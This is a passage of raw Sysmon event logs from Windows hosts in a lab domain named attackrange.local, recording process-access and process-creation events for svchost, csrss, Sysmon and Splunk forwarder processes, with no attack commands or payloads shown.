12:30:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.463{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E667-63C7-9606-00000000AF02}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.463{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E667-63C7-9606-00000000AF02}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:31.339{FE4C2B44-E667-63C7-9606-00000000AF02}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018873Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E668-63C7-4102-00000000B002}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018872Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018871Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018870Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018869Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018868Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018867Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018866Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018865Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018864Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018863Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E668-63C7-4102-00000000B002}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018862Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.985{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E668-63C7-4102-00000000B002}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018861Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.986{E5A8D418-E668-63C7-4102-00000000B002}3268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018860Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.551{E5A8D418-E668-63C7-4002-00000000B002}36161212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018859Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E668-63C7-4002-00000000B002}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018858Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018857Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018856Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018855Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018854Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018853Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018852Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 